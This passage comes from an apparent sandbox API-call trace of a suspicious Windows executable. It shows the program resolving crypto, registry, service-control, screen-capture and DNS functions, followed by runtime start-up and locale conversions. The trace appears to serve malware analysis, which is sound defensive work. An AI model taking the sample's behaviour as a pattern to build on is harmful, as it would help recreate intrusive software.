lpProcName="MessageBoxA") returned 0x767efd1e [0105.243] GetProcAddress (hModule=0x76780000, lpProcName="GetDesktopWindow") returned 0x767a0a19 [0105.243] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxW") returned 0x767efd3f [0105.243] GetProcAddress (hModule=0x76780000, lpProcName="TranslateMessage") returned 0x76797809 [0105.243] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x754b0000 [0105.243] GetProcAddress (hModule=0x754b0000, lpProcName="RegCloseKey") returned 0x754c469d [0105.243] GetProcAddress (hModule=0x754b0000, lpProcName="CloseServiceHandle") returned 0x754c369c [0105.243] GetProcAddress (hModule=0x754b0000, lpProcName="GetUserNameW") returned 0x754c157a [0105.243] GetProcAddress (hModule=0x754b0000, lpProcName="ReportEventA") returned 0x754b3ee9 [0105.243] GetProcAddress (hModule=0x754b0000, lpProcName="RegisterEventSourceA") returned 0x754c2d46 [0105.243] GetProcAddress (hModule=0x754b0000, lpProcName="DeregisterEventSource") returned 0x754c35dd [0105.243] GetProcAddress (hModule=0x754b0000, lpProcName="CryptHashData") returned 0x754bdf36 [0105.244] GetProcAddress (hModule=0x754b0000, lpProcName="RegSetValueExW") returned 0x754c14d6 [0105.244] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0105.244] GetProcAddress (hModule=0x754b0000, lpProcName="ControlService") returned 0x754d7144 [0105.244] GetProcAddress (hModule=0x754b0000, lpProcName="RegOpenKeyExW") returned 0x754c468d [0105.244] GetProcAddress (hModule=0x754b0000, lpProcName="CryptCreateHash") returned 0x754bdf4e [0105.244] GetProcAddress (hModule=0x754b0000, lpProcName="CryptEncrypt") returned 0x754d779b [0105.244] GetProcAddress (hModule=0x754b0000, lpProcName="CryptImportKey") returned 0x754bc532 [0105.244] GetProcAddress (hModule=0x754b0000, lpProcName="QueryServiceStatus") returned 0x754c2a86 [0105.244] GetProcAddress (hModule=0x754b0000, lpProcName="RegQueryValueExW") returned 0x754c46ad [0105.244] GetProcAddress (hModule=0x754b0000, lpProcName="CryptReleaseContext") returned 0x754be124 [0105.244] GetProcAddress (hModule=0x754b0000, lpProcName="OpenServiceW") returned 0x754bca4c [0105.244] GetProcAddress (hModule=0x754b0000, lpProcName="OpenSCManagerW") returned 0x754bca64 [0105.245] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContextW") returned 0x754bdf14 [0105.245] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGetHashParam") returned 0x754bdf7e [0105.245] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75670000 [0105.293] GetProcAddress (hModule=0x75670000, lpProcName="SHGetPathFromIDListW") returned 0x757017bf [0105.293] GetProcAddress (hModule=0x75670000, lpProcName="SHGetSpecialFolderLocation") returned 0x756fe141 [0105.293] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteA") returned 0x758b7078 [0105.293] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteExW") returned 0x75691e46 [0105.293] GetProcAddress (hModule=0x75670000, lpProcName="CommandLineToArgvW") returned 0x75689ee8 [0105.293] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathA") returned 0x75787804 [0105.293] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x762c0000 [0105.294] GetProcAddress (hModule=0x762c0000, lpProcName="CoInitialize") returned 0x762db636 [0105.294] GetProcAddress (hModule=0x762c0000, lpProcName="CoInitializeSecurity") returned 0x762e7259 [0105.294] GetProcAddress (hModule=0x762c0000, lpProcName="CoUninitialize") returned 0x763086d3 [0105.294] GetProcAddress (hModule=0x762c0000, lpProcName="CoCreateInstance") returned 0x76309d0b [0105.294] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x769d0000 [0105.294] GetProcAddress (hModule=0x769d0000, lpProcName=0x6) returned 0x769d3e59 [0105.294] GetProcAddress (hModule=0x769d0000, lpProcName=0x8) returned 0x769d3ed5 [0105.294] GetProcAddress (hModule=0x769d0000, lpProcName=0x9) returned 0x769d3eae [0105.295] GetProcAddress (hModule=0x769d0000, lpProcName=0xc8) returned 0x769d3f21 [0105.295] GetProcAddress (hModule=0x769d0000, lpProcName=0xca) returned 0x769dfd6b [0105.295] GetProcAddress (hModule=0x769d0000, lpProcName=0xc9) returned 0x769d4af8 [0105.295] GetProcAddress (hModule=0x769d0000, lpProcName=0xc) returned 0x769d5dee [0105.295] GetProcAddress (hModule=0x769d0000, lpProcName=0x2) returned 0x769d4642 [0105.295] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x74570000 [0105.300] GetProcAddress (hModule=0x74570000, lpProcName="GetAdaptersInfo") returned 0x74579263 [0105.300] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75360000 [0105.301] GetProcAddress (hModule=0x75360000, lpProcName=0xc) returned 0x7536b131 [0105.302] GetProcAddress (hModule=0x75360000, lpProcName=0xb) returned 0x7536311b [0105.302] GetProcAddress (hModule=0x75360000, lpProcName=0x34) returned 0x75377673 [0105.302] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x744a0000 [0105.307] GetProcAddress (hModule=0x744a0000, lpProcName="DnsFree") returned 0x744a436b [0105.307] GetProcAddress (hModule=0x744a0000, lpProcName="DnsQuery_W") returned 0x744b572c [0105.307] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x75550000 [0105.307] GetProcAddress (hModule=0x75550000, lpProcName="CryptStringToBinaryA") returned 0x75585d77 [0105.307] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x752d0000 [0105.307] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteObject") returned 0x752e5689 [0105.307] GetProcAddress (hModule=0x752d0000, lpProcName="GetObjectA") returned 0x752e85d4 [0105.308] GetProcAddress (hModule=0x752d0000, lpProcName="SelectObject") returned 0x752e4f70 [0105.308] GetProcAddress (hModule=0x752d0000, lpProcName="GetDeviceCaps") returned 0x752e4de0 [0105.308] GetProcAddress (hModule=0x752d0000, lpProcName="GetBitmapBits") returned 0x752ec155 [0105.308] GetProcAddress (hModule=0x752d0000, lpProcName="BitBlt") returned 0x752e5ea6 [0105.308] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteDC") returned 0x752e58b3 [0105.308] GetProcAddress (hModule=0x752d0000, lpProcName="CreateDCA") returned 0x752e7bcc [0105.308] GetProcAddress (hModule=0x752d0000, lpProcName="CreateCompatibleDC") returned 0x752e54f4 [0105.308] GetProcAddress (hModule=0x752d0000, lpProcName="CreateCompatibleBitmap") returned 0x752e5f49 [0105.308] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x743e0000 [0105.319] GetProcAddress (hModule=0x743e0000, lpProcName="atexit") returned 0x743fc544 [0105.320] atexit (param_1=0x710920) returned 0 [0105.372] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f498 | out: lpSystemTimeAsFileTime=0x18f498*(dwLowDateTime=0x9830eaa0, dwHighDateTime=0x1d5d833)) [0105.372] GetCurrentThreadId () returned 0x884 [0105.372] GetCurrentProcessId () returned 0x874 [0105.372] QueryPerformanceCounter (in: lpPerformanceCount=0x18f490 | out: lpPerformanceCount=0x18f490*=24630147640) returned 1 [0105.468] GetStartupInfoW (in: lpStartupInfo=0x18f428 | out: lpStartupInfo=0x18f428*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76e23519, hStdOutput=0x7733fd35, hStdError=0x773a7daf)) [0105.525] GetProcessHeap () returned 0x610000 [0105.703] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e10000 [0105.703] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0105.703] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0105.703] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0105.703] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0105.704] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0105.704] GetProcAddress (hModule=0x76e10000, lpProcName="CreateEventExW") returned 0x76ea410b [0105.704] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSemaphoreExW") returned 0x76ea4195 [0105.704] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadStackGuarantee") returned 0x76e2d31f [0105.704] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThreadpoolTimer") returned 0x76e3ee7e [0105.704] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadpoolTimer") returned 0x7736441c [0105.704] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7738c50e [0105.704] GetProcAddress (hModule=0x76e10000, lpProcName="CloseThreadpoolTimer") returned 0x7738c381 [0105.704] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThreadpoolWait") returned 0x76e3f088 [0105.704] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadpoolWait") returned 0x773705d7 [0105.705] GetProcAddress (hModule=0x76e10000, lpProcName="CloseThreadpoolWait") returned 0x7738ca24 [0105.705] GetProcAddress (hModule=0x76e10000, lpProcName="FlushProcessWriteBuffers") returned 0x77340b8c [0105.705] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x773ffde8 [0105.705] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessorNumber") returned 0x77391e1d [0105.705] GetProcAddress (hModule=0x76e10000, lpProcName="GetLogicalProcessorInformation") returned 0x76ea4761 [0105.705] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSymbolicLinkW") returned 0x76e9cd11 [0105.705] GetProcAddress (hModule=0x76e10000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0105.706] GetProcAddress (hModule=0x76e10000, lpProcName="EnumSystemLocalesEx") returned 0x76ea424f [0105.706] GetProcAddress (hModule=0x76e10000, lpProcName="CompareStringEx") returned 0x76ea46b1 [0105.706] GetProcAddress (hModule=0x76e10000, lpProcName="GetDateFormatEx") returned 0x76eb6676 [0105.706] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoEx") returned 0x76ea4751 [0105.706] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeFormatEx") returned 0x76eb65f1 [0105.706] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLocaleName") returned 0x76ea47c1 [0105.706] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidLocaleName") returned 0x76ea47e1 [0105.706] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0105.707] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentPackageId") returned 0x0 [0105.707] GetProcAddress (hModule=0x76e10000, lpProcName="GetTickCount64") returned 0x76e3eee0 [0105.707] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0105.707] GetProcAddress (hModule=0x76e10000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0105.707] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3bc) returned 0x62eec8 [0105.708] GetCurrentThreadId () returned 0x884 [0105.713] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x18) returned 0x6202a8 [0105.713] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x800) returned 0x62f290 [0105.713] GetStartupInfoW (in: lpStartupInfo=0x18f3f8 | out: lpStartupInfo=0x18f3f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x25f708a2, hStdError=0x44)) [0105.714] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0105.714] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0105.714] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.714] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe\" --Admin IsNotAutoStart IsNotTask" [0105.714] GetEnvironmentStringsW () returned 0x62fa98* [0105.872] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xaca) returned 0x630570 [0105.880] FreeEnvironmentStringsW (penv=0x62fa98) returned 1 [0105.887] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ythgrfed.exe.exe")) returned 0x36 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc4) returned 0x62fa98 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x98) returned 0x62fb68 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3e) returned 0x625280 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x6c) returned 0x62fc08 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x6e) returned 0x62fc80 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x78) returned 0x6215b0 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x62) returned 0x62fcf8 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2e) returned 0x62abc0 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x48) returned 0x626780 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x28) returned 0x62a5e8 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1a) returned 0x62ea28 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4a) returned 0x62fd68 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x72) returned 0x621630 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62abf8 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2e) returned 0x62ac30 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1c) returned 0x62ea50 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xd2) returned 0x62fdc0 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x7c) returned 0x62fea0 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x36) returned 0x62ff28 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3a) returned 0x6252c8 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x90) returned 0x62ff68 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x24) returned 0x62a618 [0105.887] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62ac68 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x36) returned 0x630000 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x48) returned 0x6267d0 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x52) returned 0x630040 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3c) returned 0x625310 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x82) returned 0x6300a0 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2e) returned 0x62aca0 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1e) returned 0x62ea78 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2c) returned 0x62acd8 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x54) returned 0x630130 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x52) returned 0x630190 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2a) returned 0x62ad10 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3c) returned 0x625358 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x54) returned 0x6301f0 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x24) returned 0x62a648 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62ad48 [0105.888] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x8c) returned 0x630250 [0105.888] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x630570 | out: hHeap=0x610000) returned 1 [0106.176] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x800) returned 0x6302e8 [0106.183] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x80) returned 0x630af0 [0106.261] GetLastError () returned 0x0 [0106.261] SetLastError (dwErrCode=0x0) [0106.261] GetLastError () returned 0x0 [0106.262] SetLastError (dwErrCode=0x0) [0106.262] GetLastError () returned 0x0 [0106.262] SetLastError (dwErrCode=0x0) [0106.262] GetACP () returned 0x4e4 [0106.262] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x220) returned 0x630b78 [0106.262] GetLastError () returned 0x0 [0106.262] SetLastError (dwErrCode=0x0) [0106.262] IsValidCodePage (CodePage=0x4e4) returned 1 [0106.262] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f3ec | out: lpCPInfo=0x18f3ec) returned 1 [0106.268] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18eeb4 | out: lpCPInfo=0x18eeb4) returned 1 [0106.273] GetLastError () returned 0x0 [0106.273] SetLastError (dwErrCode=0x0) [0106.273] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0106.279] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x18ec38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0106.279] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18eec8 | out: lpCharType=0x18eec8) returned 1 [0106.279] GetLastError () returned 0x0 [0106.279] SetLastError (dwErrCode=0x0) [0106.279] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0106.279] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x18ec08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0106.285] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0106.285] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e9f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0106.285] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f1c8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ2\x0f÷%\x04ô\x18", lpUsedDefaultChar=0x0) returned 256 [0106.285] GetLastError () returned 0x0 [0106.285] SetLastError (dwErrCode=0x0) [0106.285] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0106.285] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x18ec18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0106.285] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 